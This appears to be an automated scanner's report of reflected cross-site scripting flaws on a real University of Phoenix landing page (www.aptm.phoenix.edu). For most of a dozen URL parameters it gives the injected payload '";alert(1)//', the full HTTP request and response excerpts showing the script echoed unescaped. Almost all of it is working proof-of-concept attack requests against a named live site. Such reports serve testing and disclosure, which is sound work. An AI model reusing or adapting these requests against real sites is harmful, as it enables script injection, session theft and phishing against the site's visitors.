GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=389543536605f"%3balert(1)//45adfdbe294&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b0ef"%3balert(1)//b7cd0810838 was submitted in the destination parameter. This input was echoed as 6b0ef";alert(1)//b7cd0810838 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm6b0ef"%3balert(1)//b7cd0810838&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... gn_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm6b0ef";alert(1)//b7cd0810838&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=");
The value of the distribution request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff562"%3balert(1)//f7e8dbd9af9 was submitted in the distribution parameter. This input was echoed as ff562";alert(1)//f7e8dbd9af9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targff562"%3balert(1)//f7e8dbd9af9&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... &foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targff562";alert(1)//f7e8dbd9af9&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=&mvtkey=");
setAllowDestURLOnSubmit(true);
/* an_arr's params * 0 - poid * 1 - redirect href * 2 - has popped up ...[SNIP]...
The value of the initiative request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35a6c"%3balert(1)//51687862cc2 was submitted in the initiative parameter. This input was echoed as 35a6c";alert(1)//51687862cc2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen35a6c"%3balert(1)//51687862cc2&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... e=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen35a6c";alert(1)//51687862cc2&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=");
The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5bc8"%3balert(1)//cf689d3bc25 was submitted in the keyword parameter. This input was echoed as b5bc8";alert(1)//cf689d3bc25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006b5bc8"%3balert(1)//cf689d3bc25&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... Net/hhs?pid=62A1E89CCBA3FB2D&pvp_design=&kw=&kw=&channel=banr&category=&psrc=&psrc_url=&vrefid=&creative_id=38954353&creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&keyword=msn_careers_728x90_425006b5bc8";alert(1)//cf689d3bc25&v1=aptm&v2=&v3=&v4=&v5=&v6=&v7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=&postal_code_int=&postal_code=&program_type=&program_type2 ...[SNIP]...
The value of the mktg_prog request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fe23"%3balert(1)//02c8aa1a94a was submitted in the mktg_prog parameter. This input was echoed as 5fe23";alert(1)//02c8aa1a94a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen5fe23"%3balert(1)//02c8aa1a94a&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... e=&program_type2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen5fe23";alert(1)//02c8aa1a94a&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=&mvtkey=");
The value of the provider request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0f7a"%3balert(1)//300fb6cc037 was submitted in the provider parameter. This input was echoed as a0f7a";alert(1)//300fb6cc037 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSNa0f7a"%3balert(1)//300fb6cc037&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... int=&postal_code=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSNa0f7a";alert(1)//300fb6cc037&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=D55602 ...[SNIP]...
The value of the pvp_campaign request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 937af"%3balert(1)//10c054b4a93 was submitted in the pvp_campaign parameter. This input was echoed as 937af";alert(1)//10c054b4a93 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95937af"%3balert(1)//10c054b4a93&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... 7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=&postal_code_int=&postal_code=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95937af";alert(1)//10c054b4a93&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&desti ...[SNIP]...
The value of the unit request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be4b9"%3balert(1)//0a352431f30 was submitted in the unit parameter. This input was echoed as be4b9";alert(1)//0a352431f30 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dirbe4b9"%3balert(1)//0a352431f30&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... &postal_code_int=&postal_code=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dirbe4b9";alert(1)//0a352431f30&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no& ...[SNIP]...
The value of the user1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0112"%3balert(1)//a96fd83d2c4 was submitted in the user1 parameter. This input was echoed as f0112";alert(1)//a96fd83d2c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpmf0112"%3balert(1)//a96fd83d2c4&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... redit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpmf0112";alert(1)//a96fd83d2c4&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=D55602D1FF1E5348");
setAllowDestURLOnSubmit(true);
/* an_arr's params * 0 - poid * 1 - redirect href * 2 - has p ...[SNIP]...
The value of the user2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6d2a"%3balert(1)//193f4f335e was submitted in the user2 parameter. This input was echoed as b6d2a";alert(1)//193f4f335e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=drb6d2a"%3balert(1)//193f4f335e&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... litary=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=drb6d2a";alert(1)//193f4f335e&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=");
The value of the user3 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6707"%3balert(1)//1e6342d0321 was submitted in the user3 parameter. This input was echoed as f6707";alert(1)//1e6342d0321 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1f6707"%3balert(1)//1e6342d0321&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1f6707";alert(1)//1e6342d0321&user4=&user5=&clientdelivery=&registered_nurse=&mvtkey=");
The value of the version request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d898f"%3balert(1)//925ecac98bf was submitted in the version parameter. This input was echoed as d898f";alert(1)//925ecac98bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90d898f"%3balert(1)//925ecac98bf&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... 2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90d898f";alert(1)//925ecac98bf&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=D55602D1FF1E5348");
The value of the level_education request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 137ab"%3balert(1)//63ddfe10507a70ca9 was submitted in the level_education parameter. This input was echoed as 137ab";alert(1)//63ddfe10507a70ca9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
